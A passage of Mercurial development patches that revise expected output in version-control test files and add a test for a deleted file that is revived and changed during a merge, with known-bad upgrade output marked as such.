| (known-bad-output !) 
o i-0 initial commit: a b h p q r #else diff --git a/tests/test-histedit-non-commute-abort.t b/tests/test-histedit-non-commute-abort.t --- a/tests/test-histedit-non-commute-abort.t +++ b/tests/test-histedit-non-commute-abort.t @@ -84,6 +84,7 @@ ancestor path: e (node 0000000000000000000000000000000000000000) other path: e (node 6b67ccefd5ce6de77e7ead4f5292843a0255329f) extra: ancestorlinknode = 0000000000000000000000000000000000000000 + extra: merged = yes $ hg resolve -l U e diff --git a/tests/test-merge-changedelete.t b/tests/test-merge-changedelete.t --- a/tests/test-merge-changedelete.t +++ b/tests/test-merge-changedelete.t @@ -96,17 +96,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "u") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -163,17 +166,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "r") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node 
e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "u") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -243,17 +249,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "r") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "u") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes *** file1 does not exist --- file2 --- 2 @@ -307,17 +316,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: 
merge-removal-candidate = yes + extra: merged = yes file: file3 (state "u") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes *** file1 does not exist --- file2 --- 2 @@ -358,17 +370,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "r") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "r") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -405,17 +420,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "r") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "r") local path: file3 (hash 
d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes *** file1 does not exist --- file2 --- 2 @@ -453,17 +471,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "u") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -512,17 +533,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "u") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: 
file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -573,17 +597,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "u") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -631,17 +658,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "u") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 
--- 1 changed @@ -801,11 +831,13 @@ ancestor path: file1 (node b8e02f6433738021a065f94175c7cd23db5f05be) other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -840,11 +872,13 @@ ancestor path: file1 (node b8e02f6433738021a065f94175c7cd23db5f05be) other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes file: file2 (state "r") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -877,11 +911,13 @@ ancestor path: file1 (node b8e02f6433738021a065f94175c7cd23db5f05be) other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes file: file2 (state "r") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes *** file1 does not exist --- file2 --- 2 @@ -916,11 +952,13 @@ ancestor path: file1 (node b8e02f6433738021a065f94175c7cd23db5f05be) other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = 
ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -963,11 +1001,13 @@ ancestor path: file1 (node b8e02f6433738021a065f94175c7cd23db5f05be) other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -1011,11 +1051,13 @@ ancestor path: file1 (node b8e02f6433738021a065f94175c7cd23db5f05be) other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed diff --git a/tests/test-merge-criss-cross.t b/tests/test-merge-criss-cross.t --- a/tests/test-merge-criss-cross.t +++ b/tests/test-merge-criss-cross.t @@ -540,6 +540,7 @@ other path: the-file (node 59e363a07dc876278f0e41756236f30213b6b460) extra: ancestorlinknode = 955800955977bd6c103836ee3e437276e940a589 extra: merge-removal-candidate = yes + extra: merged = yes extra: other-file 
(filenode-source = other) $ hg ci -m "merge-deleting-the-file-from-deleted" $ hg manifest @@ -563,6 +564,7 @@ other path: the-file (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = 955800955977bd6c103836ee3e437276e940a589 extra: merge-removal-candidate = yes + extra: merged = yes $ hg ci -m "merge-deleting-the-file-from-updated" created new head $ hg manifest @@ -586,6 +588,7 @@ other path: the-file (node 59e363a07dc876278f0e41756236f30213b6b460) extra: ancestorlinknode = 955800955977bd6c103836ee3e437276e940a589 extra: merge-removal-candidate = yes + extra: merged = yes extra: other-file (filenode-source = other) $ hg ci -m "merge-keeping-the-file-from-deleted" created new head @@ -614,6 +617,7 @@ other path: the-file (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = 955800955977bd6c103836ee3e437276e940a589 extra: merge-removal-candidate = yes + extra: merged = yes $ hg ci -m "merge-keeping-the-file-from-updated" created new head $ hg manifest @@ -695,6 +699,7 @@ other path: the-file (node 885af55420b35d7bf3bbd6f546615295bfe6544a) extra: ancestorlinknode = 9b610631ab29024c5f44af7d2c19658ef8f8f071 extra: merge-removal-candidate = yes + extra: merged = yes #else $ hg debugmergestate local (working copy): adfd88e5d7d3d3e22bdd26512991ee64d59c1d8f @@ -763,6 +768,7 @@ other path: the-file (node 885af55420b35d7bf3bbd6f546615295bfe6544a) extra: ancestorlinknode = 9b610631ab29024c5f44af7d2c19658ef8f8f071 extra: merge-removal-candidate = yes + extra: merged = yes #else $ hg debugmergestate local (working copy): a4e0e44229dc130be2915b92c957c093f8c7ee3e @@ -886,6 +892,7 @@ other path: the-file (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = 9b610631ab29024c5f44af7d2c19658ef8f8f071 extra: merge-removal-candidate = yes + extra: merged = yes #else $ hg debugmergestate local (working copy): e9b7081317232edce73f7ad5ae0b7807ff5c326a @@ -923,6 +930,7 @@ other path: the-file (node 
0000000000000000000000000000000000000000) extra: ancestorlinknode = 9b610631ab29024c5f44af7d2c19658ef8f8f071 extra: merge-removal-candidate = yes + extra: merged = yes #else $ hg debugmergestate local (working copy): e9b7081317232edce73f7ad5ae0b7807ff5c326a diff --git a/tests/test-obsolete.t b/tests/test-obsolete.t --- a/tests/test-obsolete.t +++ b/tests/test-obsolete.t @@ -1844,6 +1844,7 @@ ancestor path: file (node bc7ebe2d260cff30d2a39a130d84add36216f791) other path: file (node b789fdd96dc2f3bd229c1dd8eedf0fc60e2b68e3) extra: ancestorlinknode = b73b8c9a4ab4da89a5a35a6f10dfb13edc84ca37 + extra: merged = yes We should be able to see the log (without the deleted commit, of course) $ hg log -G @ 0:f53e9479dce5 (draft) [tip ] first diff --git a/tests/test-rebase-abort.t b/tests/test-rebase-abort.t --- a/tests/test-rebase-abort.t +++ b/tests/test-rebase-abort.t @@ -95,6 +95,7 @@ ancestor path: common (node de0a666fdd9c1a0b0698b90d85064d8bd34f74b6) other path: common (node 2f6411de53677f6f1048fef5bf888d67a342e0a5) extra: ancestorlinknode = 3163e20567cc93074fbb7a53c8b93312e59dbf2c + extra: merged = yes $ hg resolve -l U common diff --git a/tests/test-resolve.t b/tests/test-resolve.t --- a/tests/test-resolve.t +++ b/tests/test-resolve.t @@ -255,11 +255,13 @@ ancestor path: file1 (node 2ed2a3912a0b24502043eae84ee4b279c18b90dd) other path: file1 (node 6f4310b00b9a147241b071a60c28a650827fb03d) extra: ancestorlinknode = 99726c03216e233810a2564cbc0adfe395007eac + extra: merged = yes file: file2 (state "u") local path: file2 (hash cb99b709a1978bd205ab9dfd4c5aaa1fc91c7523, flags "") ancestor path: file2 (node 2ed2a3912a0b24502043eae84ee4b279c18b90dd) other path: file2 (node 6f4310b00b9a147241b071a60c28a650827fb03d) extra: ancestorlinknode = 99726c03216e233810a2564cbc0adfe395007eac + extra: merged = yes $ hg resolve -l R file1 U file2 @@ -271,7 +273,7 @@ { "commits": [{"label": "working copy", "name": "local", "node": "57653b9f834a4493f7240b0681efcb9ae7cab745"}, {"label": "merge 
rev", "name": "other", "node": "dc77451844e37f03f5c559e3b8529b2b48d381d1"}], "extras": [], - "files": [{"ancestor_node": "2ed2a3912a0b24502043eae84ee4b279c18b90dd", "ancestor_path": "file1", "extras": [{"key": "ancestorlinknode", "value": "99726c03216e233810a2564cbc0adfe395007eac"}], "local_flags": "", "local_key": "60b27f004e454aca81b0480209cce5081ec52390", "local_path": "file1", "other_node": "6f4310b00b9a147241b071a60c28a650827fb03d", "other_path": "file1", "path": "file1", "state": "r"}, {"ancestor_node": "2ed2a3912a0b24502043eae84ee4b279c18b90dd", "ancestor_path": "file2", "extras": [{"key": "ancestorlinknode", "value": "99726c03216e233810a2564cbc0adfe395007eac"}], "local_flags": "", "local_key": "cb99b709a1978bd205ab9dfd4c5aaa1fc91c7523", "local_path": "file2", "other_node": "6f4310b00b9a147241b071a60c28a650827fb03d", "other_path": "file2", "path": "file2", "state": "u"}] + "files": [{"ancestor_node": "2ed2a3912a0b24502043eae84ee4b279c18b90dd", "ancestor_path": "file1", "extras": [{"key": "ancestorlinknode", "value": "99726c03216e233810a2564cbc0adfe395007eac"}, {"key": "merged", "value": "yes"}], "local_flags": "", "local_key": "60b27f004e454aca81b0480209cce5081ec52390", "local_path": "file1", "other_node": "6f4310b00b9a147241b071a60c28a650827fb03d", "other_path": "file1", "path": "file1", "state": "r"}, {"ancestor_node": "2ed2a3912a0b24502043eae84ee4b279c18b90dd", "ancestor_path": "file2", "extras": [{"key": "ancestorlinknode", "value": "99726c03216e233810a2564cbc0adfe395007eac"}, {"key": "merged", "value": "yes"}], "local_flags": "", "local_key": "cb99b709a1978bd205ab9dfd4c5aaa1fc91c7523", "local_path": "file2", "other_node": "6f4310b00b9a147241b071a60c28a650827fb03d", "other_path": "file2", "path": "file2", "state": "u"}] } ] # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615607645 -3600 # Sat Mar 13 04:54:05 2021 +0100 # Node ID e4696ba43ecd3010a1d6efc3b4dc128c9c5b5b3f # Parent 
5a0b930cfb3ee0dba307a80b0ca90b4ff4cfb823 test-copies: show some wrong ChangedFiles upgrade For file present only on one side and touched during merge, the upgrade code confused them as "merged". However they should be either "touched", or "salvaged" but they are currently recorded as "merged". See the next changesets for more details on these cases and fix. Differential Revision: https://phab.mercurial-scm.org/D10218 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -999,6 +999,8 @@ does not involve the file 'f' and the arbitration done within "mAEm" and "mEA" about that file should stay unchanged. +We also touch J during some of the merge to check for unrelated change to new file during merge. + $ case_desc="chained merges (conflict -> simple) - same content everywhere" (extra unrelated changes) @@ -1048,17 +1050,19 @@ $ hg merge 'desc("j-1")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (branch merge, don't forget to commit) + $ echo jj > unrelated-j $ hg ci -m "mEA,Jm: $case_desc" (merge variant 4) $ hg up 'desc("j-1")' - 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) - 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) + 3 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) $ hg merge 'desc("mEAm")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) 
(branch merge, don't forget to commit) + $ echo jj > unrelated-j $ hg ci -m "mJ,EAm: $case_desc" created new head @@ -1941,12 +1945,22 @@ '\x00\x00\x00\x00' ##### revision "mEA,Jm" ##### 1 sidedata entries - entry-0014 size 4 - '\x00\x00\x00\x00' + entry-0014 size 24 + '\x00\x00\x00\x01\x14\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' (no-upgraded no-upgraded-parallel !) + touched : unrelated-j, ; (no-upgraded no-upgraded-parallel !) + '\x00\x00\x00\x01\x08\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' (upgraded known-bad-output !) + merged : unrelated-j, ; (upgraded known-bad-output !) + '\x00\x00\x00\x01\x08\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' (upgraded-parallel known-bad-output !) + merged : unrelated-j, ; (upgraded-parallel known-bad-output !) ##### revision "mJ,EAm" ##### 1 sidedata entries - entry-0014 size 4 - '\x00\x00\x00\x00' + entry-0014 size 24 + '\x00\x00\x00\x01\x14\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' (no-upgraded no-upgraded-parallel !) + touched : unrelated-j, ; (no-upgraded no-upgraded-parallel !) + '\x00\x00\x00\x01\x08\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' (upgraded known-bad-output !) + merged : unrelated-j, ; (upgraded known-bad-output !) + '\x00\x00\x00\x01\x08\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' (upgraded-parallel known-bad-output !) + merged : unrelated-j, ; (upgraded-parallel known-bad-output !) ##### revision "s-1" ##### 1 sidedata entries entry-0014 size 24 # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1614646829 -3600 # Tue Mar 02 02:00:29 2021 +0100 # Node ID 316a768f2e43e1bb308b9f1265df5100ea43601e # Parent e4696ba43ecd3010a1d6efc3b4dc128c9c5b5b3f test-copies: add a test updating file content while salvaging it A deleted file is brought back during a merge. Its content is changed in the same go. This reveal some issue with the upgrade code. 
Differential Revision: https://phab.mercurial-scm.org/D10088 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -988,6 +988,63 @@ o i-0 initial commit: a b h p q r +Subcase: restoring and untouched deleted file, while touching it +```````````````````````````````````````````````````````````````` + +Merge: +- one removing a file (d) +- one leaving the file untouched +- the merge actively restore the file to the same content. + +In this case, the file keep on living after the merge. So we should not drop its +copy tracing chain. + + $ case_desc="merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge)" + + $ hg up 'desc("c-1")' + 2 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge 'desc("b-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg revert --rev 'desc("b-1")' d + $ echo "new content for d after the revert" > d + $ hg ci -m "mCB-change-m-0 $case_desc - one way" + created new head + $ hg manifest --rev . --debug | grep " d" + e333780c17752a3b0dd15e3ad48aa4e5c745f621 644 d (no-changeset !) + 4b540a18ad699234b2b2aa18cb69555ac9c4b1df 644 d (changeset !) + + $ hg up 'desc("b-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge 'desc("c-1")' + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg revert --rev 'desc("b-1")' d + $ echo "new content for d after the revert" > d + $ hg ci -m "mBC-change-m-0 $case_desc - the other way" + created new head + $ hg manifest --rev . --debug | grep " d" + e333780c17752a3b0dd15e3ad48aa4e5c745f621 644 d (no-changeset !) + 4b540a18ad699234b2b2aa18cb69555ac9c4b1df 644 d (changeset !) 
+ + + $ hg up null --quiet + $ hg log -G --rev '::(desc("mCB-change-m")+desc("mBC-change-m"))' + o mBC-change-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way + |\ + +---o mCB-change-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way + | |/ + | o c-1 delete d + | | + o | b-1: b update + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + + Decision from previous merge are properly chained with later merge ------------------------------------------------------------------ @@ -1006,7 +1063,7 @@ (extra unrelated changes) $ hg up 'desc("a-2")' - 3 files updated, 0 files merged, 1 files removed, 0 files unresolved + 6 files updated, 0 files merged, 0 files removed, 0 files unresolved $ echo j > unrelated-j $ hg add unrelated-j $ hg ci -m 'j-1: unrelated changes (based on the "a" series of changes)' @@ -1493,6 +1550,7 @@ mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way mBC+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists) + mBC-change-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way mBCm-1 re-add d @@ -1501,6 +1559,7 @@ mBFm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way mBRm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - one way mCB+revert,Lm: chained merges (salvaged -> 
simple) - same content (when the file exists) + mCB-change-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way mCBm-1 re-add d @@ -1925,6 +1984,32 @@ merged : d, ; (upgraded-parallel known-bad-output !) '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded known-bad-output !) merged : d, ; (upgraded known-bad-output !) + ##### revision "mCB-change-m-0 merge explicitely revive deleted file - B side" ##### + 1 sidedata entries + entry-0014 size 14 + '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' (no-upgraded no-upgraded-parallel !) + salvaged : d, ; (no-upgraded no-upgraded-parallel !) + '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded known-bad-output !) + merged : d, ; (upgraded known-bad-output !) + '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded missing-correct-output !) + salvaged : d, ; (upgraded missing-correct-output !) + '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded-parallel known-bad-output !) + merged : d, ; (upgraded-parallel known-bad-output !) + '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded-parallel missing-correct-output !) + salvaged : d, ; (upgraded-parallel missing-correct-output !) + ##### revision "mBC-change-m-0 merge explicitely revive deleted file - B side" ##### + 1 sidedata entries + entry-0014 size 14 + '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' (no-upgraded no-upgraded-parallel !) + salvaged : d, ; (no-upgraded no-upgraded-parallel !) + '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded known-bad-output !) + merged : d, ; (upgraded known-bad-output !) 
+ '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded missing-correct-output !) + salvaged : d, ; (upgraded missing-correct-output !) + '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded-parallel known-bad-output !) + merged : d, ; (upgraded-parallel known-bad-output !) + '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded-parallel missing-correct-output !) + salvaged : d, ; (upgraded-parallel missing-correct-output !) ##### revision "j-1" ##### 1 sidedata entries entry-0014 size 24 @@ -3443,6 +3528,65 @@ #endif +Subcase: restoring and untouched deleted file, while touching it +```````````````````````````````````````````````````````````````` + +Merge: +- one removing a file (d) +- one leaving the file untouched +- the merge actively restore the file to the same content. + +In this case, the file keep on living after the merge. So we should not drop its +copy tracing chain. + + $ hg log -G --rev '::(desc("mCB-change-m")+desc("mBC-change-m"))' + o mBC-change-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way + |\ + +---o mCB-change-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way + | |/ + | o c-1 delete d + | | + o | b-1: b update + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + + +'a' is the the copy source of 'd' + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCB-change-m-0")' + M b + A d + a 